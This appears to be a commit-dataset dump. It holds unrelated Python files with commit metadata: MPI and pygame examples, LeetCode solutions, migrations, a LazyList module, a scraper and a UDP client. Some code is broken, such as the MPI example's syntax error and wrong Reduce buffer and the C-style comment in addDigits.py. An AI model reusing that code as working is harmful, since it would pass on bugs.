os.system("rm tmp.csv") | Python | 0.000001 | |
81f4976645225b6cf4a422186a3419a06756bfc5 | add a set of test utils that will be useful for running tests | test/test_util.py | test/test_util.py | import contextlib
import os
import os.path
import mock
import requests
@contextlib.contextmanager
def mocked_requests(path):
    """mocks the requests library to return a given file's content"""
    # if environment variable is set, then don't mock the tests just grab files
    # over the network. Example:
    #     env ULMO_DONT_MOCK_TESTS=1 py.test
    if os.environ.get('ULMO_DONT_MOCK_TESTS', False):
        yield
    else:
        test_path = test_file_path(path)
        with open(test_path, 'rb') as f:
            # Build a real requests.Response whose raw body streams from
            # the local fixture file instead of the network.
            mock_response = requests.Response()
            mock_response.status_code = 200
            mock_response.raw = f
            # Any requests.get() inside the block receives the canned
            # response; the patch is undone when the block exits.
            with mock.patch('requests.get', return_value=mock_response):
                yield
def test_file_path(file_path):
"""translates a file path to be relative to the test files directory"""
return os.path.join(os.path.dirname(__file__), 'files', file_path)
| Python | 0.000009 | |
0827fce61013172fa7183ee294189275030c0faf | Create code_5.py | MPI_Practice_Examples/code_5.py | MPI_Practice_Examples/code_5.py | #dotProductParallel_1.py
#"to run" syntax example: mpiexec -n 4 python26 dotProductParallel_1.py 40000
from mpi4py import MPI
import numpy
import sys
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
#read from command line
n = int(sys.argv[1]) #length of vectors
#arbitrary example vectors, generated to be evenly divided by the number of
#processes for convenience
x = numpy.linspace(0,100,n) if comm.rank == 0 else None
y = numpy.linspace(20,300,n) if comm.rank == 0 else None
#initialize as numpy arrays
dot = numpy.array([0.])
local_n = numpy.array([0])
#test for conformability
if rank == 0:
if (n != y.size):
print "vector length mismatch"
comm.Abort()
#currently, our program cannot handle sizes that are not evenly divided by
#the number of processors
if(n % size != 0):
print "the number of processors must evenly divide n."
comm.Abort()
#length of each process's portion of the original vector
local_n = numpy.array([n/size])
#communicate local array size to all processes
comm.Bcast(local_n, root=0)
#initialize as numpy arrays
local_x = numpy.zeros(local_n)
local_y = numpy.zeros(local_n)
#divide up vectors
comm.Scatterv([x,(0,100,n),MPI.DOUBLE], local_x)
comm.Scatterv([y, (20,300,n), MPI.DOUBLE] local_y)
#local computation of dot product
local_dot = numpy.array([numpy.dot(local_x, local_y)])
#sum the results of each
comm.Reduce(local_dot, local_n, op = MPI.SUM)
if (rank == 0):
print "The dot product is", dot[0], "computed in parallel"
print "and", numpy.dot(x,y), "computed serially"
| Python | 0.001674 | |
6454548da01dbc2b9f772a5c0ffb11a03dc933e7 | Add module capable of rendering a circle when ran | draw_shape.py | draw_shape.py | import pygame
pygame.init()
#-- SCREEN CHARACTERISTICS ------------------------->>>
background_color = (255,255,255)
(width, height) = (300, 200)
#-- RENDER SCREEN ---------------------------------->>>
screen = pygame.display.set_mode((width, height))
screen.fill(background_color)
#pygame.draw.circle(canvas, color, position(x,y), radius, thickness)
# Red circle outline (1px thick) centred in the 300x200 window.
pygame.draw.circle(screen, (255,0,0), (150, 100), 10, 1)
#-- RUN LOOP --------------------------------------->>>
pygame.display.flip()
running = True
while running:
    # Keep draining events so the window stays responsive; exit on close.
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
| Python | 0 | |
469b28aec45c9832e4cfe658143316fb15e103d1 | Add server | server.py | server.py | print("Hola mundo")
| Python | 0.000001 | |
6ac6f9f3f933a98af8722561ba181ca50c6ad1fe | Add performance test | perftest.py | perftest.py | import resource
try:
    # bugfix: time.clock() was deprecated since Python 3.3 and removed in
    # 3.8; perf_counter() is the documented replacement for benchmarking.
    from time import perf_counter as clock
except ImportError:  # interpreters predating perf_counter
    from time import clock
from sortedsets import SortedSet


def test(size):
    """Build a SortedSet of `size` entries and report creation time plus
    insert/delete throughput measured over ~1000 middle elements."""
    tm = clock()
    ss = SortedSet((str(i), i*10) for i in range(size))
    create_time = clock() - tm
    print("SORTED SET WITH", size, "ELEMENTS", ss._level, "LEVELS")
    print("Memory usage", resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
    print("Creation time ", format(create_time, '10.2f'), "s")
    # Pick ~1000 evenly spaced keys away from both ends.
    num = 1000
    step = size // (num + 2)
    items = []
    for i in range(step, size-step, step):
        items.append((str(i), i*10))
    tm = clock()
    for k, v in items:
        del ss[k]
    del_time = num/(clock() - tm)
    tm = clock()
    for k, v in items:
        ss[k] = v
    ins_time = num/(clock() - tm)
    print("Insertion speed", format(ins_time, '10.2f'), "ins/s")
    print("Deletion speed ", format(del_time, '10.2f'), "del/s")
for size in (10000, 100000, 1000000, 10000000):
test(size)
| Python | 0.000043 | |
a107d3c088e13c4bf1a600f0ebf2664321d6799f | add solution for Binary Tree Maximum Path Sum | src/binaryTreeMaximumPathSum.py | src/binaryTreeMaximumPathSum.py | # Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    """Maximum path sum in a binary tree: the best total over any
    downward-connected node sequence (the path may bend at one node)."""

    # @param root, a tree node
    # @return an integer
    def maxPathSum(self, root):
        # Seed with the root value so a single (possibly negative) node
        # is handled; an empty tree yields 0.
        self.res = root.val if root else 0
        self.dfs(root)
        return self.res

    def dfs(self, root):
        """Return the best downward path sum starting at root, updating
        self.res with the best path that bends at root."""
        if root is None:
            return 0
        best_left = self.dfs(root.left)
        best_right = self.dfs(root.right)
        # Negative branches contribute nothing.
        if best_left < 0:
            best_left = 0
        if best_right < 0:
            best_right = 0
        bent = root.val + best_left + best_right
        if bent > self.res:
            self.res = bent
        return root.val + (best_left if best_left > best_right else best_right)
| Python | 0.000001 | |
4fdef464be6eabee609ecc4327493c277693c0e0 | Make content text mandatory | content/migrations/0023_auto_20160614_1130.py | content/migrations/0023_auto_20160614_1130.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-14 09:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make the ``text`` field mandatory on Comment and Content.

    Both fields are redefined as plain ``TextField``s with no optional
    flags (presumably dropping a previous ``blank=True`` -- confirm
    against migration 0022).
    """

    dependencies = [
        ('content', '0022_auto_20160608_1407'),
    ]

    operations = [
        # Comment.text becomes required free text.
        migrations.AlterField(
            model_name='comment',
            name='text',
            field=models.TextField(verbose_name='Text'),
        ),
        # Content.text becomes required free text.
        migrations.AlterField(
            model_name='content',
            name='text',
            field=models.TextField(verbose_name='Text'),
        ),
    ]
| Python | 0.999999 | |
b106bb6f346811181c9fde27147f7b1685827cbe | 436. Find Right Interval. Brute force | p436_bruteforce.py | p436_bruteforce.py | import sys
import unittest
# Definition for an interval.
class Interval(object):
    """Simple interval value object with ``start`` and ``end`` endpoints."""

    def __init__(self, s=0, e=0):
        self.start = s
        self.end = e
class Solution(object):
    def findRightInterval(self, intervals):
        """For each interval, return the index of its "right" interval.

        The right interval of ``intervals[i]`` is the interval ``j != i``
        with the smallest ``start`` satisfying ``start >= intervals[i].end``;
        -1 when no such interval exists.  Brute-force O(n^2) scan.

        Fixed to be Python-3 compatible: the original used ``xrange`` and
        ``sys.maxint``, both removed in Python 3.  ``enumerate`` plus a
        ``None`` sentinel behaves identically (and still runs on Python 2).

        :type intervals: List[Interval]
        :rtype: List[int]
        """
        result = []
        for i, cur in enumerate(intervals):
            best_index = -1
            best_start = None  # sentinel replacing sys.maxint
            for j, cand in enumerate(intervals):
                if j == i:
                    continue
                # Candidate must not start before `cur` ends and must beat
                # the best (smallest) qualifying start seen so far.
                if cand.start >= cur.end and (best_start is None or
                                              cand.start < best_start):
                    best_index = j
                    best_start = cand.start
            result.append(best_index)
        return result
class Test(unittest.TestCase):
    """Unit tests for Solution.findRightInterval."""

    def test(self):
        # Cases: single interval, a fully chained set, and a mix where some
        # entries have no right neighbour.
        self._test([[1, 2]], [-1])
        self._test([[3, 4], [2, 3], [1, 2]], [-1, 0, 1])
        self._test([[1, 4], [2, 3], [3, 4]], [-1, 2, -1])

    def _test(self, intervals, expected):
        # Build Interval objects from [start, end] pairs and compare output.
        intervals = [Interval(a[0], a[1]) for a in intervals]
        actual = Solution().findRightInterval(intervals)
        self.assertEqual(actual, expected)


if __name__ == '__main__':
    unittest.main()
| Python | 0.999464 | |
5a857703de5fc1e67e958afb41a10db07b98bfa1 | Add migration script to fix valid users with date_confirmed==None | scripts/migrate_unconfirmed_valid_users.py | scripts/migrate_unconfirmed_valid_users.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to migrate users with a valid date_last_login but no date_confirmed."""
import sys
import logging
from website.app import init_app
from website.models import User
from scripts import utils as script_utils
from tests.base import OsfTestCase
from tests.factories import UserFactory
from modularodm import Q
import datetime as dt
logger = logging.getLogger(__name__)


def do_migration(records):
    """Backfill ``date_confirmed`` from ``date_last_login`` for each user.

    Users that were not registered are also flipped to registered.
    NOTE: records are mutated in place; no save/persist call happens here.
    """
    for record in records:
        record.date_confirmed = record.date_last_login
        if not record.is_registered:
            record.is_registered = True
        logger.info('Finished migrating user {0}'.format(record._id))
def get_targets():
    """Query users missing ``date_confirmed`` but having a last-login date."""
    return User.find(Q('date_confirmed', 'eq', None) & Q('date_last_login', 'ne', None))
def main():
    """Run the migration, or just list affected users when 'dry' is in argv."""
    init_app(routes=False)  # Sets the storage backends on all models
    dry_run = 'dry' in sys.argv
    if dry_run:
        for user in get_targets():
            print(user)
    else:
        do_migration(get_targets())
class TestMigrateNodeCategories(OsfTestCase):
    # NOTE(review): class name looks copy-pasted from another migration
    # script; these tests actually cover the unconfirmed-users migration.

    def test_get_targets(self):
        # NOTE(review): this queries date_confirmed != None -- the opposite
        # of get_targets() -- so it only smoke-tests that the query runs.
        test = User.find(Q('date_confirmed', 'ne', None) & Q('date_last_login', 'ne', None))
        assert test is not None

    def test_do_migration(self):
        """Migrated users gain date_confirmed (= last login) and registration."""
        today = dt.datetime.utcnow()
        user1 = UserFactory.build(date_confirmed=None, date_last_login=today, is_registered=False)
        user2 = UserFactory.build(date_confirmed=None, date_last_login=today, is_registered=True)
        user1.save()
        user2.save()
        user_list = User.find(Q('_id', 'eq', user1._id) | Q('_id', 'eq', user2._id))
        do_migration(user_list)
        # `is today` holds because do_migration assigns the same object.
        assert user1.date_confirmed is today
        assert user1.is_registered
        assert user2.date_confirmed is today
        assert user2.is_registered
if __name__ == '__main__':
    # Attach file-based logging for this script before running the migration.
    script_utils.add_file_logger(logger, __file__)
    main()
| Python | 0.000184 | |
e12371408af1682904483341fd1f41ef6034a17f | add test | OperateSystem/Ex1/Test/SellTest.py | OperateSystem/Ex1/Test/SellTest.py | # -*- coding: utf-8 -*-
__author__ = 'jayin'
import requests
import threading
def buy_ticket():
    # Hit the local ticket server's /buy1 endpoint once and print which
    # thread bought what.  (Python 2 print-statement syntax.)
    res = requests.get('http://localhost:8000/buy1')
    print threading.currentThread().getName() + u' buy ticket ' + res.content
def main():
    """Fire 39 concurrent buyer threads (numbered 1..39) at the ticket server."""
    for buyer_no in range(1, 40):
        worker = threading.Thread(target=buy_ticket, name=buyer_no)
        worker.start()


if __name__ == '__main__':
    main()
edeffbcbe8fb239553c73fa37e73c0188ffc2479 | Add unit test for retrieving credentials from environment variables | tests/test_cli.py | tests/test_cli.py | import sys
import fixtures
import imgurpython
import testtools
import imgur_cli.cli as cli
# Fake credential values injected into os.environ by TestImgurCli.make_env().
FAKE_ENV = {'IMGUR_CLIENT_ID': 'client_id',
            'IMGUR_CLIENT_SECRET': 'client_secret',
            'IMGUR_ACCESS_TOKEN': 'access_token',
            'IMGUR_REFRESH_TOKEN': 'refresh_token',
            'IMGUR_MASHAPE_KEY': 'mashape_key'}
class TestImgurCli(testtools.TestCase):
    """Tests for credential loading from environment variables."""

    def make_env(self, exclude=None):
        """Monkey-patch os.environ with FAKE_ENV minus the keys in `exclude`."""
        if not exclude:
            exclude = []
        env = {key: value for key, value in FAKE_ENV.items() if key not in exclude}
        self.useFixture(fixtures.MonkeyPatch('os.environ', env))

    def test_imgur_credentials_env(self):
        # Full environment: all five credentials come back in order.
        self.make_env()
        expected = ('client_id', 'client_secret', 'access_token', 'refresh_token',
                    'mashape_key')
        imgur_credentials = cli.imgur_credentials()
        self.assertEqual(expected, imgur_credentials)
        # Mashape key is optional: missing -> None in its slot.
        self.make_env(exclude=['IMGUR_MASHAPE_KEY'])
        expected = ('client_id', 'client_secret', 'access_token', 'refresh_token',
                    None)
        imgur_credentials = cli.imgur_credentials()
        self.assertEqual(expected, imgur_credentials)
        # Client id/secret are mandatory: missing either raises.
        self.make_env(exclude=['IMGUR_CLIENT_ID'])
        self.assertRaises(imgurpython.client.ImgurClientError,
                          cli.imgur_credentials)
        self.make_env(exclude=['IMGUR_CLIENT_SECRET'])
        self.assertRaises(imgurpython.client.ImgurClientError,
                          cli.imgur_credentials)
| Python | 0 | |
4c148281ee8071ea8f150362388a44cf5c0895bf | Add exception classes. | tgif/exception.py | tgif/exception.py | """ All exceptions go here.
"""
class Friday(Exception):
    """Base exception for the Friday game.
    """
class GameOver(Friday):
""" Indicats that the game is overed.
"""
| Python | 0 | |
ff079da977990b7d6e71c6d92c5a9299fa92d123 | Add module listtools implementing class LazyList. | photo/listtools.py | photo/listtools.py | """Some useful list classes.
**Note**: This module might be useful independently of photo-tools.
It is included here because photo-tools uses it internally, but it is
not considered to be part of the API. Changes in this module are not
considered API changes of photo-tools. It may even be removed from
future versions of the photo-tools distribution without further
notice.
"""
from collections import MutableSequence
class LazyList(MutableSequence):
"""A list generated lazily from an iterable.
LazyList provides list access to the sequence of elements from the
iterable. Elements are taken out lazily. That means, the
elements are taken from the iterable not before they are actually
accessed. Once taken out, the elements are stored in a
conventional list in order to provide random access. The string
representation operator of LazyList only displays the elements
taken out of the iterable so far.
Note: if the list is accessed at the end using negative indices,
all elements are taken from the iterable before returning the
result. Some operations implicitly access the list at the end and
thus take all elements from the iterable. These operations
include `len()` and `append()`. Do not access the list at the end
using negativ indices or append to the list if you cannot afford
to take all elements out of the iterable.
>>> l = LazyList((0, 1, 2, 3, 4))
>>> l
[]
>>> l[1]
1
>>> l
[0, 1]
>>> del l[1]
>>> l
[0]
>>> l[8]
Traceback (most recent call last):
...
IndexError: list index out of range
>>> l
[0, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> l[-2]
3
>>> l
[0, 1, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> list(l) == [0, 1, 2, 3, 4]
True
>>> l
[0, 1, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> len(l)
5
>>> l
[0, 1, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> l.append(5)
>>> l
[0, 1, 2, 3, 4, 5]
>>> def naturals():
... n = 0
... while True:
... yield n
... n += 1
...
>>> l = LazyList(naturals())
>>> l[1]
1
>>> l
[0, 1]
>>> l[4:2:-1]
[4, 3]
>>> l
[0, 1, 2, 3, 4]
>>> l[8]
8
>>> l
[0, 1, 2, 3, 4, 5, 6, 7, 8]
>>> l[17:11]
[]
>>> l
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
"""
def __init__(self, iterable):
self.iterable = iter(iterable)
self.elements = []
def _access(self, index):
"""Try to take out the elements covered by index from the iterable.
The argument may be an int or a slice. Do not raise an error,
even if not enough elements can be delivered by the iterable.
"""
m = 0
if isinstance(index, int):
m = index + 1 if index >= 0 else -1
elif isinstance(index, slice):
if index.step is not None and index.step < 0:
m = index.start + 1 if index.start >= 0 else -1
else:
m = index.stop if index.stop >= 0 else -1
while len(self.elements) < m or m < 0:
try:
self.elements.append(next(self.iterable))
except StopIteration:
break
def __len__(self):
self._access(-1)
return len(self.elements)
def __getitem__(self, index):
self._access(index)
return self.elements.__getitem__(index)
def __setitem__(self, index, value):
self._access(index)
self.elements.__setitem__(index, value)
def __delitem__(self, index):
self._access(index)
self.elements.__delitem__(index)
def insert(self, index, value):
self._access(index)
self.elements.insert(index, value)
def append(self, value):
self._access(-1)
self.elements.append(value)
def __nonzero__(self):
self._access(0)
return len(self) > 0
def __str__(self):
return str(self.elements)
def __repr__(self):
return repr(self.elements)
| Python | 0 | |
a6935d250dfdbc275ce450f813697b73ebc291e3 | Create addDigits.py | Puzzles/leetcode/April-9th-2016/addDigits.py | Puzzles/leetcode/April-9th-2016/addDigits.py | /*
[ref.href] leetcode.com/problems/add-digits
"
Given a non-negative integer num, repeatedly add all its digits
until the result has only one digit.
For example:
Given num = 38, the process is like: 3 + 8 = 11, 1 + 1 = 2.
Since 2 has only one digit, return it.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem
and creating all test cases.
"
*/
class Solution(object):
    def addDigits(self, n):
        """
        :type num: int
        :rtype: int
        """
        # Repeatedly collapse n into its digit sum until one digit remains.
        while n >= 10:
            total = 0
            while n:
                n, digit = divmod(n, 10)
                total += digit
            n = total
        return n
| Python | 0 | |
85142dd9f7413dcb7c214ec251d21c93517ce26c | add AcoraMatcher tool | AcoraMatcher.py | AcoraMatcher.py | # coding:utf-8
import cPickle
import json
import acora
from atma import tool
import collections
from itertools import groupby
class AcoraMatcher:
    """Aho-Corasick keyword matcher built on the `acora` library (Python 2)."""
    def __init__(self, spec_set, min_count=1, min_len=1):
        # spec_set may be a dict/Counter (keyword -> count, filtered by
        # min_count/min_len) or a plain list of keywords used as-is.
        key_lst = []
        if type(spec_set) == dict or type(spec_set) == collections.Counter:
            for spec, cnt in spec_set.items():
                if cnt >= min_count and len(spec) >= min_len:
                    key_lst.append(spec)
        elif type(spec_set) == list:
            key_lst = spec_set
        else:
            print 'ERROR: wrong value type:', type(spec_set)
            exit(-1)
        self.builder = acora.AcoraBuilder(key_lst)
        self.ac = self.builder.build()
    def match(self, des, whole_match=True):
        """Find keyword occurrences in `des`.

        With whole_match=True a hit only counts when it is bounded by
        punctuation/whitespace (the `letters` set) or the string edges.
        Keywords listed in `wrong_spec` are always skipped.
        """
        ret = []
        # Characters treated as word boundaries for whole-word matching.
        letters = set("!\"$%&'()*+,.:;<>?@[\]^_`{|}~ -")
        wrong_spec = ['other', 'no', 'A', 'none']
        for kw, pos in self.ac.findall(des):
            # print des[pos - 1] == ' '
            # print des[pos: pos + len(kw)]
            # print pos+len(kw) == len(des), len(des), pos, len(kw), des[pos + len(kw) - 1] in letters
            if kw in wrong_spec:
                continue
            if not whole_match:
                ret.append((kw, pos))
            # remove non whole match
            elif (pos == 0 or des[pos-1] in letters) and (pos+len(kw) == len(des) or des[pos+len(kw)] in letters):
                ret.append((kw, pos))
        return ret  # return value format: [(match_string, start_pos)], start_pos starts from 0
    @staticmethod
    def longest_match(matches):
        """Keep only the leftmost-longest, non-overlapping matches.

        Sorts by (position, length descending) -- Python 2 tuple-unpacking
        lambda -- then greedily keeps matches extending past the last end.
        """
        ret = []
        matches = sorted(matches, key=lambda (x, y): (y, len(x) * -1))
        last_end = 0
        for m in matches:
            if len(m[0]) + m[1] > last_end:
                ret.append(m)
                last_end = len(m[0]) + m[1]
        return ret
    @staticmethod
    def distribution_counter(count_dic, items):
        # Tally occurrences of each item into the caller-supplied dict.
        for i in items:
            key = i
            if key not in count_dic:
                count_dic[key] = 1
            else:
                count_dic[key] += 1
| Python | 0 | |
7a880376e098f60b1666833bb6b14b359b0ebda5 | add fitness_spider.py | Exercise/fitness_spider.py | Exercise/fitness_spider.py | from bs4 import BeautifulSoup
import requests
from selenium import webdriver
import time
import sqlite3
from selenium import webdriver
import json
driver = webdriver.PhantomJS()
class Fitness:
    """Scraper for exercise pages on hiyd.com."""
    # Page counter, advanced by the driver loop at module bottom.
    i = 0
    # Base URL; a page number and trailing slash are appended per request.
    url = "http://www.hiyd.com/dongzuo/"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'
    }
    def get_info(self, url):
        """Fetch a page, extract the JSON blob passed to e.init(), print it."""
        response = requests.get(url, headers=self.headers, timeout=5)
        # driver.get(url)
        soup = BeautifulSoup(response.text, "html.parser")
        # soup = BeautifulSoup(driver.page_source, "html.parser")
        # The payload lives in the page's last <script> tag.
        text = str(soup.find_all("script")[-1])
        # print(driver.page_source)
        # Slice out the argument of e.init( ... );
        data_text = text.split("e.init(")[1].split(");")[0]
        json_text = json.loads(data_text)
        print(json_text)
if __name__ == "__main__":
    spider = Fitness()
    # Crawl page 1 only; raise the bound to fetch more exercise pages.
    while spider.i < 1:
        spider.i += 1
        spider.get_info(spider.url + str(spider.i) + "/")
a8fd0bfa974ff818ec105a42c585bae48030a086 | Create notebooknetc.py | _src/om2py3w/3wex0/notebooknetc.py | _src/om2py3w/3wex0/notebooknetc.py | # _*_coding:utf-8_*_
# 客户端程序
from socket import *
import time
import notebooknets
def main():
    # UDP note-taking client (Python 2): read lines from stdin, send each to
    # the local server, print the echoed reply and append it to history.
    # NOTE(review): 65565 is likely a typo for 65535 (max UDP payload);
    # harmless as a receive-buffer size.
    BUF_SIZE = 65565
    ss_addr = ('127.0.0.1', 8800)
    cs = socket(AF_INET, SOCK_DGRAM)
    while True:
        global data
        data = raw_input('Please Input data>')
        cs.sendto(data, ss_addr)
        data, addr = cs.recvfrom(BUF_SIZE)
        print "Data: ", data
        # NOTE(review): `cs.close` below is missing parentheses, so it is a
        # no-op -- and actually calling close() inside the loop would break
        # the next sendto; the statement looks like a leftover.
        cs.close
        notebooknets.history(data)
if __name__ == '__main__':
    main()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.